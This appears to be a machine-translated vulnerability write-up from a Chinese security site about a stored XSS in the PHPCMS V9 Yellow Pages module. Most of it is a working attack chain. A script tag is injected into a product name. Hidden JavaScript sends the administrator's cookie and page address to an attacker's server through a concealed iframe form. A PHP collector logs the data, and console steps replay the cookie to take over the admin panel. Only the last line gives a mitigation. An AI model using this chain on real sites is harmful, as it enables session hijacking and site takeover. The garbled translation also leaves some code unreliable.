Yellow Pages module XSS vulnerability to get PHPCMS V9 admin permissions and repair programme-vulnerability warning-the black bar safety net

ID MYHACK58:62201233622
Type myhack58
Reporter 佚名
Modified 2012-04-10T00:00:00



PHPCMS in the background is by the Cookie with the QueryString in pc_hash to determine whether you are a system administrator, wherein the Cookie is there the user local, pc_hash is the presence of the site database. If you get both and in the configuration of the browser environment then you open the website the background you can get the appropriate administrator permissions.

PHPCMS V9's basic module design are not strictly not strictly filter user input so that the user can construct scripts and submitted successfully. And this script as long as access to the user's Cookie data has been PC_HASH then you can construct a browser environment without having to log into the background management system.

Vulnerability reproduce

The first assumption you have is a website of the merchant, a member and already have permission to publish the product or the business opportunity or the other may be in the background of the interface to see the list of types.

We add a product type, note that in the Product name here when the structure of the following text: {random name}<script src={jsurl}></script>, wherein jsurl for your remote site script.

Then click on the Submit, then the administrator in the view module-for business yellow pages-of information-of Product Information Management when it is already the default call your remote with it.

Then your remote script should be how to get to the corresponding Cookie with pc_hash.

There is a PHP code like this:

<? php print_r($_SERVER['HTTP_REFERER']); print_r($_COOKIE);

But this actually does not work, because the Cookies cross-domain. Can not get to the key of the Cookie.

Here since said toXSShave to use JavaScript.

(function() { var createElement = function(tag, obj) { //create element var elem = document. createElement(tag); for( var k in obj ) { if( obj. hasOwnProperty(k) ) { elem[k] = obj[k]; } } return elem; } document. write('<style type="text/css">. h{display:none}</style>'); var href = window.a location. href, cookie = document. cookie, iframe = createElement("IFRAME", { name : "QPWOEIRU96", src : "about:blank", className : "h" }), form = createElement("FORM",{ target : "QPWOEIRU96", action : "", //remote PHP file method : "POST", //submission id : "QPWOEIRU96", className : 'h' }); form. appendChild(createElement("textarea", { name : "cookie", value : cookie })); form. appendChild(createElement("textarea", { //background address name : "href", value : href })); form. appendChild(createElement("textarea", { //site name : "host", value : "http://" + window. location. host })); form. appendChild(createElement("textarea", { //time to Unix timestamp name : "time", value : +new Date() })); document. body. appendChild(iframe); document. body. appendChild(form); document. getElementById("QPWOEIRU96"). submit(); })();

Why write then? Because this script has a covert. You run with don't run the admin is not seeing any intuitive transformation, and use closure properties, not the global JavaScript object damage.

The script above the idea is: to construct an id called QPWOEIRU96 form, and then sent to a QPWOEIRU96 the hidden iframe, to achieve a POST cross-domain sending of data.

Of course you need the remote to create a script to get the data, you can use the following sentence in PHP code:

<? php file_put_contents("temp.txt", json_encode($_POST) . "\r\n", FILE_APPEND);

Then just wait for the site administrator who caught it.

How to use the acquired data?

With the growth of time you will find the temp. txt under the hordes of a lot more json data.

Direct access to the last data put into the Chrome console:

window. location = (get json data). host;// 跳 到 该 页面 之后 再 执行 以下 的 document.cookie = (get json data). cookie;window. location = (get json data). href;

Then you will find it gorgeous into the background Management page.


PC_HASH with the Cookie will expire, so grab the data immediately into it.

If you do not know the password, you can only log in once if you quit, unless the next time you get the data otherwise not be able to use the last data entered.


Deactivate PHPCMS V9's basic module wait for the official fix or own filtering